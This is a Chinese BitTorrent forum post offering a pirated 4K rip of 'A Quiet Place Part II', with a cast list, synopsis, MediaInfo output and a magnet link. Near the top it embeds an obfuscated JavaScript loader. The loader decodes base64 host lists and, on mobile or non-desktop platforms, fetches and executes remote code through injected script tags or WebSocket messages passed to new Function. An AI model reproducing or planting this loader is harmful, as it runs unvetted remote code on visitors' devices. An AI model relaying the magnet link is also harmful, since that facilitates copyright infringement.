寂静之地2[双语字幕]A.Quiet.Place.Part.II.2020.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit-迅雷下载 11.34GB

版主小s 2月前 412

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 寂静之地2 / 无声绝境II(港) / 噤界II(台) / A Quiet Place 2
◎片  名 A Quiet Place: Part II
◎年  代 2021
◎产  地 美国
◎类  别 科幻 / 惊悚 / 恐怖
◎语  言 英语
◎上映日期 2021-05-28(中国大陆/美国)
◎IMDb链接 https://www.imdb.com/title/tt8332922/
◎豆瓣评分 6.5/10 (108222人评价)
◎豆瓣链接 https://movie.douban.com/subject/30206311/
◎片  长 97分钟
◎导  演 约翰·卡拉辛斯基 John Krasinski (id:1027146)
◎编  剧 约翰·卡拉辛斯基 John Krasinski (id:1027146)
       斯科特·贝克 Scott Beck (id:1029358)
       布莱恩·伍兹 Bryan Woods (id:1052734)
◎演  员 艾米莉·布朗特 Emily Blunt (id:1041022)
       基里安·墨菲 Cillian Murphy (id:1047992)
       米利森特·西蒙兹 Millicent Simmonds (id:1374192)
       诺亚·尤佩 Noah Jupe (id:1356120)
       约翰·卡拉辛斯基 John Krasinski (id:1027146)
       杰曼·翰苏 Djimon Hounsou (id:1044880)
       奥基里特·奥诺多瓦 Okieriete Onaodowan (id:1382437)
       斯科特·麦克纳里 Scoot McNairy (id:1302972)
       扎卡里·戈林格 Zachary Golinger (id:1457353)
       布莱克·德隆 Blake DeLong (id:1457674)
       加里·桑当 Gary Sundown (id:1457675)
       阿什利·戴克 Ashley Dyke (id:1366174)
       韦恩·杜瓦尔 Wayne Duvall (id:1019154)
       克兹托夫·克里斯·马杜拉 Krzysztof 'Kris' Mardula (id:1419252)
       阿利森·西格 Allyson Seeger (id:1457351)
       乔安·佩里塔诺 JoAnn Perritano (id:1392782)
       迈克尔·贝 Michael Bay (id:1027776)
       安德鲁·福姆 Andrew Form (id:1457352)
       布拉德利·福勒 Bradley Fuller (id:1284314)
       约翰·卡拉辛斯基 John Krasinski (id:1027146)
       马可·贝尔崔米 Marco Beltrami (id:1027998)
       波莉·摩根 Polly Morgan (id:1429254)
       劳拉·罗森塔尔 Laura Rosenthal (id:1296112)
       杰西·冈作 Jess Gonchor (id:1010149)
       南茜·黑格 Nancy Haigh (id:1285800)
       卡西娅·瓦利卡-麦蒙 Kasia Walicka-Maimone (id:1290762)

◎标  签 惊悚 / 恐怖 / 美国 / 科幻 / 惊恐 / 2021 / 悬疑 / 超自然

◎简  介
  故事紧承上一部展开。在丈夫为保护家人牺牲后,伊芙琳(艾米莉·布朗特 饰)不得不独自带着孩子们(米莉森·西蒙斯、诺亚·尤佩 饰)面对全新的生存挑战。他们将被迫离开家园,踏上一段未知的旅途。在无声的世界里,除了要躲避“猎声怪物”的捕杀,铺满细沙的道路尽头还暗藏着新的危机。

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 301031102494038662294330148725647163822 (0xE2787B4035C4285F5322D4AD4FD741AE)
  4. Complete name                            : A.Quiet.Place.Part[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 11.3 GiB
  8. Duration                                 : 1 h 37 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 16.7 Mb/s
  11. Movie name                               : A Quiet Place Part II 2020 2160p HDR UHD BluRay TrueHD 7.1 Atmos [email protected]
  12. Encoded date                             : UTC 2021-07-24 01:29:09
  13. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  14. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  15. Video
  16. ID                                       : 1
  17. Format                                   : HEVC
  18. Format/Info                              : High Efficiency Video Coding
  19. Format profile                           : Main [email protected]@High
  20. HDR format                               : SMPTE ST 2086, HDR10 compatible
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 1 h 37 min
  23. Bit rate                                 : 12.4 Mb/s
  24. Width                                    : 3 840 pixels
  25. Height                                   : 1 600 pixels
  26. Display aspect ratio                     : 2.40:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.084
  33. Stream size                              : 8.42 GiB (74%)
  34. Title                                    : @HDSky
  35. Writing library                          : x265 - H.265/HEVC codec
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Color range                              : Limited
  39. Color primaries                          : BT.2020
  40. Transfer characteristics                 : PQ
  41. Matrix coefficients                      : BT.2020 non-constant
  42. Mastering display color primaries        : Display P3
  43. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2
  44. Maximum Content Light Level              : 739 cd/m2
  45. Maximum Frame-Average Light Level        : 331 cd/m2
  46. Audio
  47. ID                                       : 2
  48. Format                                   : MLP FBA 16-ch
  49. Format/Info                              : Meridian Lossless Packing FBA with 16-channel presentation
  50. Commercial name                          : Dolby TrueHD with Dolby Atmos
  51. Codec ID                                 : A_TRUEHD
  52. Duration                                 : 1 h 37 min
  53. Bit rate mode                            : Variable
  54. Bit rate                                 : 4 224 kb/s
  55. Maximum bit rate                         : 7 821 kb/s
  56. Channel(s)                               : 8 channels
  57. Channel layout                           : L R C LFE Ls Rs Lb Rb
  58. Sampling rate                            : 48.0 kHz
  59. Frame rate                               : 1 200.000 FPS (40 SPF)
  60. Compression mode                         : Lossless
  61. Stream size                              : 2.86 GiB (25%)
  62. Title                                    : English
  63. Language                                 : English
  64. Default                                  : Yes
  65. Forced                                   : No
  66. Number of dynamic objects                : 11
  67. Bed channel count                        : 1 channel
  68. Bed channel configuration                : LFE
  69. Text #1
  70. ID                                       : 3
  71. Format                                   : PGS
  72. Muxing mode                              : zlib
  73. Codec ID                                 : S_HDMV/PGS
  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  75. Duration                                 : 1 h 24 min
  76. Bit rate                                 : 5 731 b/s
  77. Count of elements                        : 692
  78. Stream size                              : 3.47 MiB (0%)
  79. Title                                    : CHS
  80. Language                                 : Chinese
  81. Default                                  : Yes
  82. Forced                                   : No
  83. Text #2
  84. ID                                       : 4
  85. Format                                   : PGS
  86. Muxing mode                              : zlib
  87. Codec ID                                 : S_HDMV/PGS
  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  89. Duration                                 : 1 h 24 min
  90. Bit rate                                 : 5 877 b/s
  91. Count of elements                        : 692
  92. Stream size                              : 3.56 MiB (0%)
  93. Title                                    : CHT
  94. Language                                 : Chinese
  95. Default                                  : No
  96. Forced                                   : No
  97. Text #3
  98. ID                                       : 5
  99. Format                                   : PGS
  100. Muxing mode                              : zlib
  101. Codec ID                                 : S_HDMV/PGS
  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  103. Duration                                 : 1 h 24 min
  104. Bit rate                                 : 9 988 b/s
  105. Count of elements                        : 698
  106. Stream size                              : 6.05 MiB (0%)
  107. Title                                    : CHS&ENG
  108. Language                                 : Chinese
  109. Default                                  : No
  110. Forced                                   : No
  111. Text #4
  112. ID                                       : 6
  113. Format                                   : PGS
  114. Muxing mode                              : zlib
  115. Codec ID                                 : S_HDMV/PGS
  116. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  117. Duration                                 : 1 h 24 min
  118. Bit rate                                 : 10.1 kb/s
  119. Count of elements                        : 698
  120. Stream size                              : 6.14 MiB (0%)
  121. Title                                    : CHT&ENG
  122. Language                                 : Chinese
  123. Default                                  : No
  124. Forced                                   : No
  125. Menu
  126. 00:00:00.000                             : en:Chapter 01
  127. 00:06:39.190                             : en:Chapter 02
  128. 00:12:16.319                             : en:Chapter 03
  129. 00:17:00.269                             : en:Chapter 04
  130. 00:26:28.170                             : en:Chapter 05
  131. 00:33:26.338                             : en:Chapter 06
  132. 00:38:06.701                             : en:Chapter 07
  133. 00:45:53.751                             : en:Chapter 08
  134. 00:51:18.033                             : en:Chapter 09
  135. 00:55:35.916                             : en:Chapter 10
  136. 01:02:21.279                             : en:Chapter 11
  137. 01:08:43.828                             : en:Chapter 12
  138. 01:16:31.921                             : en:Chapter 13
  139. 01:21:25.881                             : en:Chapter 14
  140. 01:28:12.996                             : en:Chapter 15


TAGS 惊悚 恐怖 科幻

磁力链:
  • magnet:?xt=urn:btih:DB172F6F140ED27D3638BA3A0D3F84E2C326D1BF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回